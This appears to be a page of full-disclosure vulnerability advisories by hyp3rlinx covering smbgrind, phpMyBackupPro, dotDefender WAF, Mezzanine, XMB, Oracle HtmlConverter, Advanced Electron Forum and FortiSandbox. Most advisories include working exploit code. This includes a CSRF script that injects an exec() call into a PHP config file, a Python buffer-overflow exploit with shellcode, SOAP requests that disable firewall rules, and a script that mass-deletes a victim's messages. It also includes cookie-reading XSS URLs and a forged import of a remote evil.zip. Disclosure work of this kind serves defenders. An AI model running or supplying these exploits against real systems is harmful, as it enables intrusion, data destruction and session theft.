granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Re: Symantec EP DOS
*** Be aware "Gerado Sanchez" is re-posting and stealing vulnerability reports work/credits as his own, he is also using similar nicknames, emails etc. ORIGINAL Symantec EP DOS POST from "hyp3rlinx" is found here dated Jul 08 2015. http://www.securityfocus.com/archive/1/535958
CyberCop Scanner Smbgrind v5.5 Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SMBGRIND-BUFFER-OVERFLOW.txt Vendor: === Network Associates Inc. Product: === smbgrind: NetBIOS parallel password grinder circa 1996-1999 smbgrind.exe is a component of CyberCop Scanner v5.5. It is intended to remotely crack SMB usernames and passwords, used to establish a login session to the remote NetBIOS file server. Cybercop was discontinued back in 2002. usage: smbgrind -i [options] -r Remote NetBIOS name of destination host -i IP address of destination host -u Name of userlist file (default NTuserlist.txt) -p Name of password list file (default NTpasslist.txt) -l Number of simultaneous connections (max: 50 default: 10) -v Provide verbose output on progress Vulnerability Type: === Buffer Overflow CVE Reference: == N/A Vulnerability Details: == Smbgrind.exe succumbs to buffer overflow when supplied a large number of bytes (1206) for the -r switch for the remote NetBios name of destination host. Resulting in memory corruption overwriting several registers... GDB dump... Program received signal SIGSEGV, Segmentation fault. 0x0040c421 in ?? () (gdb) info r eax0x3 3 ecx0x41414141 1094795585 edx0x41414141 1094795585 ebx0x41414141 1094795585 esp0x241e89c0x241e89c ebp0x241e8a80x241e8a8 esi0x401408 4199432 edi0x41414141 1094795585 eip0x40c421 0x40c421 eflags 0x10283 [ CF SF IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x53 83 gs 0x2b 43 (gdb) smbgrind core dump file... (C:\smbgrind.exe 1000) exception C005 at 40C421 (C:\smbgrind.exe 1000) exception: ax 2 bx 41414141 cx 41414141 dx 41414141 (C:\smbgrind.exe 1000) exception: si 401408 di 41414141 bp 241F39C sp 241F390 (C:\smbgrind.exe 1000) exception is: STATUS_ACCESS_VIOLATION [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. hyp3rlinx
phpMyBackupPro v.2.5 Remote Command Execution / CSRF
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-RCE.txt Vendor: = www.phpmybackuppro.net project site: sourceforge.net/projects/phpmybackup/ Product: === phpMyBackupPro v.2.5 (PMBP) phpMyBackup Pro is a very easy to use, free, web-based MySQL backup application, licensed under the GNU GPL. You can create scheduled backups, manage and restore them, download or email them and a lot more. Vulnerability Type: = Remote Command Execution / CSRF CVE Reference: == N/A Vulnerability Details: = phpMyBackupPro uses PHP configuration files (global_conf.php) to manage settings, allowing user to change things like sql host, language, email etc.. However, a malicious local user can also inject persistent arbitrary PHP/OS commands into the configuration to be executed on the host system. The remote command execution can also be a result of a CSRF driveby by if currently logged admin visits an attackers webpage. Attackers can inject and write to disk arbitrary PHP code into the global_conf.php configuration file if a victim visits a malicious webpage or clicks an infected link via a CSRF vector or additionally from a local malicious user in shared host type environment. first we escape the single quotes etc... so we can close the expected entry, then we leverage the backtick "`" operator to have PHP execute OS commands on victims system as it works just as well without having to deal with all the quote escaping. e.g. payload that handles the single "'" quote an forward slashes "/"... ''///\\');exec(`c:/\Windows/\system32/\calc.exe`); ///\'; The above when injected will result in a write to $CONF variables in global_conf.php as follows... $CONF['lang']=ue('\'\'///\\');exec(`c:/Windows/system32/calc.exe`); ///\';'); OR... $CONF['email']=ue('\'\'///\\');exec(`c:/Windows/system32/calc.exe`); ///\';'); Exploit code(s): === Send admin infected link or convince them to visit our malicious webpage, then if the user is logged in and... a) clicks our link or visits our evil webpage or b) submits the form locally (malicious user) then BOOOM! Exploit to run calc.exe on Windows var c=0; (function RCE_MAYHEM(){ c++ var xhr=new XMLHttpRequest() xhr.open('POST','<a rel="nofollow" href="http://localhost/phpMyBackupPro-2.5/phpMyBackupPro-2.5/config.php">http://localhost/phpMyBackupPro-2.5/phpMyBackupPro-2.5/config.php</a>',true) xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.withCredentials = true; xhr.send("sitename=localhost&lang=''///\\');exec(`c:/\Windows/\system32/\calc.exe`); ///\';&sql_host=localhost&sql_user=&sql_passwd=&sql_db=&ftp_server=hyp3rlinx.altervista.org&ftp_user=hyp3rlinx&ftp_passwd=&ftp_path=&ftp_pasv=1&ftp_port=666&ftp_del=1&email_use=1&email=&submit=Save+data") if(c<2){ RCE_MAYHEM() } })() Disclosure Timeline: = Vendor Notification: NR February 16, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: High Description: = Request Method(s):[+] POST Vulnerable Product: [+] phpMyBackupPro v.2.5 (PMBP) Vulnerable Parameter(s): [+] $CONF [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
phpMyBackupPro v.2.5 Arbitrary File Upload
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-FILE_UPLOAD_VULN.txt Vendor: = www.phpmybackuppro.net project site: sourceforge.net/projects/phpmybackup/ Product: === phpMyBackupPro v.2.5 (PMBP) phpMyBackup Pro is a very easy to use, free, web-based MySQL backup application, licensed under the GNU GPL. You can create scheduled backups, manage and restore them, download or email them and a lot more. Vulnerability Type: Arbitrary File Upload CVE Reference: == N/A Vulnerability Details: = phpMyBackupPro allows SQL uploads but fails to check the actual file type, allowing arbitrary file uploads which can lead to arbitrary OS command, backdoor shells etc... Exploit code(s): === Arbitary File Upload under "database queries" user has option to 'Upload sql file': 1) upload malicious PHP file containing as an SQL import using select "fragmented". 2) click 'Yes' when prompted 'Do you really want to import this backup?' 3) make HTTP request to process the uploaded PHP file e.g. http://localhost/phpMyBackupPro-2.5/export/EVIL.php and BOOM! 'export' directory comes unprotected with no .htaccess file etc.. and most important file upload type is not checked. Disclosure Timeline: = Vendor Notification: NR February 16, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: High Description: = Request Method(s):[+] POST Vulnerable Product: [+] phpMyBackupPro v.2.5 (PMBP) [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
phpMyBackupPro v.2.5 XSS
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-XSS.txt Vendor: = www.phpmybackuppro.net project site: sourceforge.net/projects/phpmybackup/ Product: === phpMyBackupPro v.2.5 (PMBP) phpMyBackup Pro is a very easy to use, free, web-based MySQL backup application, licensed under the GNU GPL. You can create scheduled backups, manage and restore them, download or email them and a lot more. Vulnerability Type: XSS CVE Reference: == N/A Vulnerability Details: = phpMyBackupPro is vulnerable to multiple XSS entry points allowing arbitrary client side code execution within victims browser. Undermining the trust between the client and server...if the user clicks an infected linx or visits a malicious webpage. Exploit code(s): === XSS 1) http://localhost/phpMyBackupPro-2.5/get_file.php?download=true=%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E XSS 2) http://localhost/phpMyBackupPro-2.5/db_info.php?table=alert('XSS hyp3rlinx') XSS 3) http://localhost/phpMyBackupPro-2.5/big_import.php?dbn=phpdug=%3Cscript%3Ealert%28666%29%3C%2Fscript%3E=0=0=0=0=1 XSS 4) http://localhost/phpMyBackupPro-2.5/big_import.php?dbn=alert(666)<%2Fscript>&fn=http%3A%2F%2Fhyp3rlinx.altervista.org%2Fhell.sql&start=0&foffset=0&totalqueries=0&sn=0&delete=1 XSS 5) <form id="XSS" action="<a rel="nofollow" href="http://localhost/phpMyBackupPro-2.5/sql_query.php"">http://localhost/phpMyBackupPro-2.5/sql_query.php"</a>; method="post"> <input type="hidden" name="db" value="mysql" /> <input type="hidden" name="sql_query" value="<script>alert('XSS hyp3rlinx \n\n'+document.cookie)" /> document.getElementById('XSS').submit() Disclosure Timeline: = Vendor Notification: NR February 16, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: High Description: = Request Method(s):[+] GET / POST Vulnerable Product: [+] phpMyBackupPro v.2.5 (PMBP) [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
dotDefender Firewall CSRF
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DOT-DEFENDER-CSRF.txt Vendor: == www.applicure.com Product: = dotDefender Firewall Versions: 5.00.12865 / 5.13-13282 dotDefender is a Web application firewall (WAF) for preventing hacking attacks like XSS, SQL Injections, CSRF etc... that provides Apache and IIS Server Security across Dedicated, VPS and Cloud environments. It meets PCI Compliance and also provides E-Commerce Security, IIS and Apache Security, Cloud Security and more. Vulnerability Type: = Cross Site Request Forgery - CSRF CVE Reference: == N/A Vulnerability Details: = Dotdefender firewall (WAF) is vulnerable to cross site request forgery, this allows attackers to make HTTP requests via the victims browser to the dotdefender management server on behalf of the victim if the victim is logged in and visits a malicious web page or clicks an infected link. Result can be modifying or disabling various firewall patterns, User-Defined Rule settings and global event logging etc... HTTP requests sent to Dotdefender to enable or disable user-Defined rule settings are base64 encoded using SOAP protocol. Sending the below base64 value for example disables a Dotdefender firewall setting. PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+ false Tested successfully on Windows & Linux: dotDefender Version: 5.00.12865 Web Server Type: Microsoft-IIS Server Operating System: Windows Web Server Version: 7.5 Firefox web browser dotDefender Version: 5.13-13282 Web Server Type: Apache Server Operating System: Linux Exploit code(s): === Example to send requests to disable firewall rule settings that defends against SQL injection. We need to send two requests first to modify the desired settings and second to commit our changes. HTTP request 0x01 - send following soap request to disable SQL Injection request firewall rule ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ http://localhost/dotDefender/dotDefenderWS.exe; ENCTYPE="text/plain" method="post" onsubmit="TORMENT()"> document.getElementById('SACRIFICIAL').submit() HTTP request 0x02 - send the next request to commit the changes ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ http://localhost/dotDefender/dotDefenderWS.exe; ENCTYPE="text/plain" method="post"> function TORMENT(){document.getElementById('VICTIM').submit()} Other SOAP payload examples for rule disabling: ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~= this is disable a rule #19, send the below request to disable remote IP protections: http://www.w3.org/2001/XMLSchema-instance; xmlns:xsd="http://www.w3.org/2001/XMLSchema; xmlns:ZSI=" http://www.zolera.com/schemas/ZSI/; xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/; xmlns:SOAP-ENC=" http://schemas.xmlsoap.org/soap/encoding/; xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/; soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/;> http://applicure.com/dotDefender;>0 /ud_rules/request_rules/request_rule[rule_id=19]/enabled PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+ disable rule 20: ~=~=~=~=~=~=~=~= http://www.w3.org/2001/XMLSchema-instance; xmlns:xsd="http://www.w3.org/2001/XMLSchema; xmlns:ZSI="http://www.zolera.com/schemas/ZSI/; xmlns:SOAP-ENV=" http://schemas.xmlsoap.org/soap/envelope/; xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/; xmlns:soapenv=" http://schemas.xmlsoap.org/soap/envelope/; soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/;>http://applicure.com/dotDefender;> 0/ud_rules/request_rules/request_rule[rule_id=20]/enabled PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+ Finally commit them with below request: ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~= http://www.w3.org/2001/XMLSchema-instance; xmlns:xsd="http://www.w3.org/2001/XMLSchema; xmlns:ZSI="http://www.zolera.com/schemas/ZSI/; xmlns:SOAP-ENV=" http://schemas.xmlsoap.org/soap/envelope/; xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/; xmlns:soapenv=" http://schemas.xmlsoap.org/soap/envelope/; soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/;>http://applicure.com/dotDefender;> 0 Disclosure Timeline: Vendor Notifications: initial report 11/16/2015 vendor response 11/20/2015 vendor delays for two months 1/19/2016 Vendor finally acknowledges vulnerability inform vendor of a disclosure date vendor no longer responds Feb 8, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: == High Descr
Mezzanine CMS 4.1.0 XSS
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MEZZANINE-CMS-XSS.txt Vendor: === mezzanine.jupo.org Product: Mezzanine 4.1.0 Mezzanine is an open source CMS built using the python based Django framework. Vulnerability Type: === XSS CVE Reference: == N/A Vulnerability Details: = XSS entry points exists within the filebrowser_safe package. In many areas throughout filebrowser, querystring parameters are passed directly into templates to form URLS for links and forms, and these were not being escaped correctly, therefore allowing arbitrary JavaScript code to be injected. In order to exploit this, a attacker would need to trick an authenticated administrator into clicking a malicious link or viewing a malicious web page containing the XSS payload. Resolution: Upgrade right away (pip install -U filebrowser_safe). If for some reason you're unable to upgrade seamlessly, here is the fix which you need to apply: https://github.com/stephenmcd/filebrowser-safe/commit/14b30017d27ca6a952e1578ed8cecbb102979967 Exploit code(s): === XSS 1) http://localhost:8000/admin/media-library/rename/?ot=desc=date=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E XSS 2) http://localhost:8000/admin/media-library/rename/?ot=desc=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E= XSS 3) http://localhost:8000/admin/media-library/rename/?ot=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E== XSS 4) http://localhost:8000/admin/media-library/browse/?ot=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E=gallery=date XSS 5) http://localhost:8000/admin/media-library/upload/?ot=desc=gallery=%3C%2Fscript%3E%3Cscript%3Ealert%28666%29%3C%2Fscript%3E XSS 6) http://localhost:8000/admin/media-library/upload/?ot=%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS\n\nhyp3rlinx%27%29%3C%2Fscript%3E=gallery=date XSS 7) http://localhost:8000/admin/media-library/upload//static/filebrowser/uploadify/?=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E Disclosure Timeline: = Vendor Notification: January 26, 2016 Feburary 2, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: High Description: === Request Method(s):[+] GET Vulnerable Product: [+] Mezzanine 4.1.0 === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
XMB - eXtreme Message Board v1.9.11.13 Weak Crypto
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/XMB-WEAK-CRYPTO.txt Vendor: == xmbforum2.com Product: == XMB - eXtreme Message Board v1.9.11.13 XMB forum software is open source and runs PHP scripts with a MySQL database backend. Vulnerability Type: === Weak Crypto / Insecure Password Storage Vulnerability Details: = 1) Weak Crypto XMB Forum uses weak MD5 hashing algorithm and no salt, the unsalted passwords are then stored in a browser cookie and also in the 'xmb_members' table of the XMB database. Using weak cryptographic one-way hash functions like MD5 without using salt for storing user passwords allows attackers that gain access to this data ability to conduct password cracking attacks using pre-computed dictionaries, e.g. rainbow tables. 2) Insecure Storage Storing user passwords in unsalted MD5 hash form leaves them vulnerable both online and offline. I noticed XMB has no session timeout/logout mechanism for if a user is inactive for a certain period of time and does not logout, leaving thier MD5 unsalted passwords stored in cookies on disc. This further allows thier passwords to be vulnerable to theft if their local machine is compromised. However, even if the user logs out and XMB cookies are cleared the passwords are still in the MySQL database on the server unsalted and MD5 hashed. POC: = Example XMB cookie ... MD5 password of 'abc123' > 'e99a18c428cb38d5f260853678922e03' "xmblva=1453182891; xmblvb=1453178920; xmbuser=admin; xmbpw=e99a18c428cb38d5f260853678922e03; xmblva=1453091894; On disc ---> %APPDATA%\Roaming\Mozilla\Firefox\Profiles in the 'cookies.sqlite' database file used by Firefox. e.g. localhostxmbpwe99a18c428cb38d5f260853678922e03localhost/XMB-1.9.11.13/files In "member.php" on line 493 under files/ dir of XMB application we see hashing of user password using weak MD5 hashing function, then being stored in the MySQL database. $password = md5($password); if ($SETTINGS['regoptional'] == 'off') { $db->query("INSERT INTO ".X_PREFIX."members (username, password, regdate, postnum, email, etc In 'member.php' line 599 we see it stored in cookie ---> put_cookie("xmbpw", $password, $currtime, $cookiepath, $cookiedomain); Disclosure Date: Vendor Notification: NA January 23, 2016 : Public Disclosure [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Oracle HtmlConverter.exe Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt Vendor: === www.oracle.com Product: Java Platform SE 6 U24 HtmlConverter.exe Product Version: 6.0.240.50 The HTML Converter is part of Java SE binary part of the JDK and Allows web page authors to explicitly target the browsers and platforms used in their environment when modifying their pages. Vulnerability Type: Buffer Overflow CVE Reference: == N/A Vulnerability Details: = When calling htmlConverter.exe with specially crafted payload it will cause buffer overflow executing arbitrary attacker supplied code. This was a small vulnerability included as part of the overall Oracle CPU released on January 19, 2016. Reference: http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html registers ... EAX FFFE ECX FFFE EDX 0008E3C8 EBX 7EFDE000 ESP 0018FEB4 EBP 0018FF88 ESI 1DB1 EDI EIP 52525252 < "" \x52 C 0 ES 002B 32bit 0() P 0 CS 0023 32bit 0() A 1 SS 002B 32bit 0() Z 0 DS 002B 32bit 0() S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0() D 0 Exploit code(s): === ###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "#EIP @ 2493 pgm="C:\\Program Files (x86)\\Java\jdk160_24\\bin\\HtmlConverter.exe " #EIP 2469 - 2479 #shellcode to pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") #JMP ESP kernel32.dll rp=struct.pack('<L', 0x76E72E2B) payload="A"*2469+rp+"\x90"*10+sc subprocess.Popen([pgm, payload], shell=False) Disclosure Timeline: = Vendor Notification: August 28, 2015 January 20, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: === Medium Description: = Vulnerable Product: [+] Java SE 6 U24 HtmlConverter.exe = [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Advanced Electron Forum v1.0.9 Persistent XSS
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-XSS.txt Vendor: = www.anelectron.com/downloads/ Product: Advanced Electron Forum v1.0.9 (AEF) Exploit patched current version. Vulnerability Type: === Persistent XSS CVE Reference: == N/A Vulnerability Details: = In Admin panel under Edit Boards / General Stuff / General Options There is an option to sepcify a redirect URL for the forum. See --> Redirect Forum: Enter a URL to which this forum will be redirected to. The redirect input field is vulnerable to a persistent XSS that will be stored in the MySQL database and execute attacker supplied client side code each time a victim visits the following URLs. http://localhost/AEF(1.0.9)_Install/index.php? http://localhost/AEF(1.0.9)_Install/index.php?act=admin=forums=editforum=1 Exploit code(s): === Persistent XSS http://localhost/AEF(1.0.9)_Install/index.php?act=admin=forums=editforum=1" method="post"> document.getElementById('XSS-DE-PERSISTO').submit() Some other misc XSS(s) under 'Signature' area. http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=signature on Anchor link setting http://"onMouseMove="alert(0) AND http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=writepm email link: mailto:"onMouseMove="alert(1) Disclosure Timeline: = Vendor Notification: NA January 17, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: High Description: = Request Method(s):[+] POST Vulnerable Product: [+] AEF v1.0.9 (exploit patched version) Vulnerable Parameter(s): [+] 'fredirect' = [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Advanced Electron Forum v1.0.9 CSRF
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-CSRF.txt Vendor: = www.anelectron.com/downloads/ Product: Advanced Electron Forum v1.0.9 (AEF) Exploit patched current version. Vulnerability Type: === CSRF CVE Reference: == N/A Vulnerability Details: = In Admin panel no CSRF protections exist in multiple areas allowing remote attackers to make HTTP request on behalf of the victim if they currently have a valid session (logged in) and visit or click an infected link, resulting in some of the following destructions. 0x01: Change current database settings 0x02: Delete all Inbox / Sent Emails 0x03: Delete all 'shouts' 0x04: Delete all Topics by the way, edit profile, avatar and more all seem vulnerable as well.. Exploit code(s): === CSRF 0x01: change mysql db settings note: however you will need to know or guess the database name. http://localhost/AEF(1.0.9)_Install/index.php?act=admin=conpan=mysqlset" method="post" name="mysqlsetform"> document.getElementById('DOOM').submit() CSRF 0x02: Delete all Inbox / Sent emails... http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=sentitems" method="post"> http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=inbox" method="post"> //Sent Email IDs seem to be stored using even numbers 2,4,6 etc... //Inbox Email IDs seem to use odd numbers var c=-1 var uwillsuffer; var amttodelete=1 var inbox=document.getElementById("inbox") var outbox=document.getElementById("sent") function RUIN_EVERYTHING(){ c++ //Inbox IDs are even numbered Sent are odd. if(c % 2 == 0){ arguments[3].value=c document.getElementById(arguments[1]).submit() }else{ arguments[2].value=c document.getElementById(arguments[0]).submit() } if(c>=amttodelete){ clearInterval(uwillsuffer) alert("Done!") } } uwillsuffer = setInterval(RUIN_EVERYTHING, 1000, "DOOM", "DESTRUCT", inbox, outbox) CSRF 0x03: Delete all 'Shouts' http://localhost/AEF(1.0.9)_Install/index.php?act=admin=conpan=shoutboxset" method="post"> document.getElementById('SPECTOR_OF_HATE').submit() CSRF 0x04: Delete all 'Topics' via simple GET request, this will delete topics 1 thru 7... http://localhost/AEF(1.0.9)_Install/index.php?act=deletetopic=7,6,5,4,3,2,1 Disclosure Timeline: === Vendor Notification: NA January 17, 2016 : Public Disclosure Exploitation Technique: == Remote Severity Level: High Description: === Request Method(s): [+] POST / GET Vulnerable Product:[+] AEF v1.0.9 (exploit patched version) === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Advanced Electron Forum v1.0.9 RFI / CSRF
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-RFI.txt Vendor: = www.anelectron.com/downloads/ Product: Advanced Electron Forum v1.0.9 (AEF) Exploit patched current version. Vulnerability Type: Remote File Inclusion / CSRF CVE Reference: == N/A Vulnerability Details: = In Admin control panel there is option to Import Skins and one choice is using a web URL. >From AEF: "Specify the URL of the theme on the net. The theme file must be a compressed archive (zip, tgz, tbz2, tar)." However there is no CSRF token or check made that this is a valid request made by the currently logged in user, resulting in arbitrary remote file imports from an attacker if the user visits or clicks an malicious link. Victims will then be left open to arbitrary malicious file downloads from anywhere on the net which may be used as a platform for further attacks... Exploit code(s): === http://localhost/AEF(1.0.9)_Install/index.php?act=admin=skin=import" method="post"> http://hyp3rlinx.altervista.org/evil.zip; /> document.getElementById('EL-DOWNLOADO').submit() Disclosure Timeline: == Vendor Notification: NA January 17, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: === High Description: == Request Method(s): [+] POST Vulnerable Product:[+] Advanced Electron Forum v1.0.9 (AEF) == [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Multiple XSS vulnerabilities in FortiSandbox WebUI
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FORTISANDBOX-0801.txt Vendor: www.fortinet.com PSIRT ID: 1418018 Product: == FortiSandbox 3000D v2.02 build0042 Vulnerability Type: === XSS CVE Reference: == Pending Advisory Information: === Multiple XSS vulnerabilities in FortiSandbox WebUI Impact A remote unauthenticated attacker may be able to execute arbitrary code in the security context of an authenticated user's browser session. Affected Products FortiSandbox 2.0.4 and lower. Solutions Upgrade to FortiSandbox 2.1 or above. Vulnerability Details: http://www.fortiguard.com/advisory/FG-IR-15-019/ The Web User Interface of FortiSandbox version 2.0.4 and below is vulnerable to multiple reflected Cross-Site Scripting vulnerabilities. 5 potential XSS vectors were identified: * Fortiview threats by users search filtered by serial * Fortiview threats by users search filtered by vdom * Export report feature in the Fortiview search page * Screenshot download generated by the VM scan feature * PCAP file download generated by the VM scan feature Exploit code(s): === 1) https://localhost/alerts/summary/profile/?prof_type=byusers-profilefrom=byusers-filterusername=10.10.10.10serial=scriptalert(666)/scriptscriptalert('XSS by hyp3rlinx 06012015')/scriptvdom=from_time_period=1440#frag-1 vulnerable parameter: serial -- 2) https://localhost/csearch/report/export/?urlForCreatingReport=scriptalert(666)/scriptscriptalert('XSS by hyp3rlinx June 1, 2015')/script vulnerable parameter: urlForCreatingReport 3) https://localhost/analysis/detail/download/screenshot?id=/scriptalert('XSS by hyp3rlinx June 1, 2015 '%2bdocument.cookie)/script vulnerable parameter: id -- Disclosure Timeline: Vendor Notification: June 1, 2015 Vendor Disclosure: July 24, 2015 August 1, 2015 : Public Disclosure Fixed In Firmware 2.1 Discovery Status: = Published Exploitation Technique: === Remote unauthenticated Severity Level: === Medium Description: = Request Method(s): [+] GET Vulnerable Product: [+] FortiSandbox 3000D v2.02 Vulnerable Parameter(s):[+] serial, urlForCreatingReport, id Affected Area(s): [+] FortiSandbox Web Admin UI = [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
phpFileManager 0.9.8 Remote Command Execution
